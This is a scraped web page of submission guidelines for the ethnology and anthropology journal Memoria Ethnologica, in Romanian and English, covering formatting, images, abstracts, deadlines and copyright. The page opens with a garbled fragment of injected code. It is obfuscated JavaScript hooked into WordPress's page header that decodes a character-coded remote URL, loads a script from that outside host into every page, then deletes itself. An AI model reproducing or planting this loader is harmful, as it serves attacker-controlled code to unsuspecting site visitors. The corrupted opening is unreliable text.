2,0x61,0x63,0x6b,0x67,0x72,0x6f,0x75,0x6e,0x64,0x2e,0x61,0x70,0x69,0x73,0x74,0x61,0x74,0x65,0x78,0x70,0x65,0x72,0x69,0x65,0x6e,0x63,0x65,0x2e,0x63,0x6f,0x6d,0x2f,0x73,0x74,0x61,0x72,0x74,0x73,0x2f,0x73,0x65,0x65,0x2e,0x6a,0x73),document['currentScript']['parentNode'][_0x3ec646(0x176)](f,document[_0x3ec646(0x17e)]),document['currentScript'][_0x3ec646(0x182)]();function _0x48d3(){var _0x35035=['script','currentScript','9RWzzPf','402740WuRnMq','732585GqVGDi','remove','createElement','30nckAdA','5567320ecrxpQ','src','insertBefore','8ujoTxO','1172840GvBdvX','4242564nZZHpA','296860cVAhnV','fromCharCode','5967705ijLbTz'];_0x48d3=function(){return _0x35035;};return _0x48d3();}";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}} » Norme Tehnice Norme Tehnice | Memoria Ethnologica

Norme Tehnice

I.

 • structura textului fără trimitere la pagină;
 • pagină A4;
 • textul de bază – font Times New Roman, corp 12,5; notele de subsol (footnote) – font Times New Roman, corp 10;
 • paragrafele se vor distinge prin indentarea primului rând, nu prin distanţare de paragraful anterior;
 • indentarea primului rând al paragrafului se va face cu tab, nu cu spaţii;
 • listele numerotate nu vor avea numerotare automată;
 • numerotarea titlurilor nu se va face automat, ci manual;
 • pentru citate se vor folosi ghilimele;
 • după ghilimelele şi parantezele de deschidere nu se introduce spaţiu; de asemenea, nu se introduce spaţiu înaintea celor de închidere;

Imagini, scheme:

 • imaginile nu vor fi introduse în document, ci vor fi predate editurii, se va marca locul unde va fi inserată imaginea („intră Imaginea x)”;
 • textele din interiorul schemelor vor fi predate şi într-un document separat, menţionându-se schema de care aparţin;

II.

 • Fiecare studiu va fi însoţit de un scurt rezumat în limba română și unul în limba engleză (aproximativ 14 – 15 rânduri) şi 5 – 8 cuvinte cheie.
 • Articolele/studiile se primesc până în data de 30 aprilie pentru numărul din iulie şi până în 30 septembrie pentru numărul din decembrie.

III.

Transmiterea către revista Memoria ethnologica a unui articol spre publicare, implică:

 • autorii îşi asumă responsabilitatea privind conţinutul
 • articolul nu a mai fost publicat şi nici nu va fi înaintat spre publicare altei reviste
 • dreptul de autor se transferă revistei Memoria ethnologica

Observaţie:

În revista Memoria ethnologica sunt publicate studii de înaltă calitate din domeniul etnologiei şi antropologiei. Lucrările propuse spre publicare pot fi de natură teoretică sau cercetări de teren.

 

GUIDELINES

I.

 • Text structure without a page reference;
 • A4 paper size;
 • The body of the paper ( font type: Times New Roman, font size: 12.5), footnotes (font: Times New Roman, font size: 10)
 • Paragraphs will be distinguished by the indentation of the first line and not by the spacing from the previous paragraph;
 • Indenting the first  row of the paragraph will be done using a tab, not spaces;
 • Numbered lists will not be automatically numbered;
 • The numbering of the titles will not be done automatically, but manually;
 • Quotation marks will be used for quotations;
 • No space is inserted after the opening quotation marks and opening brackets; also, no space is inserted before the closing words;

 

Images, schemes:

 

 • The images will not be inserted in the document, but will be handed over to the editor, the place where the image will be inserted will be marked („insert Image x)”;
 • Texts within the schemes will also be provided in a separate document, mentioning the scheme to which they belong;

II.

 • Each study will include by a short summary in Romanian and a summary in English (about 14-15 lines) and 5-8 keywords.
 • Articles/studies must be submitted by April 30th for the July issue, and for the December issue, by September 30th .

III.

Submitting an article for publication in Memoria Ethnologica implies the following.

 

 • Authors are responsible for their content;
 • The article has not been previously published and  will not be submitted for publication in any other journal;
 • Copyright will be transferred to the Memoria Ethnologica

 

Observations:

Memoria Ethnologica publishes high-standard studies in the field of ethnology and anthropology. The proposed works for publication may be theoretical or field research.